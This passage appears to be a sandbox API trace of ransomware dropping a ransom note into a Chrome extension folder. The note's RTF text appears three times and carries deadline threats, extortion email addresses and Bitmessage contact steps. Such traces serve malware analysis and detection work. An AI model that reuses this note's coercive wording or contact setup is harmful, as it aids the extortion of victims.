(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0292.113] GetLastError () returned 0x2 [0292.113] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.114] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.114] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.114] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 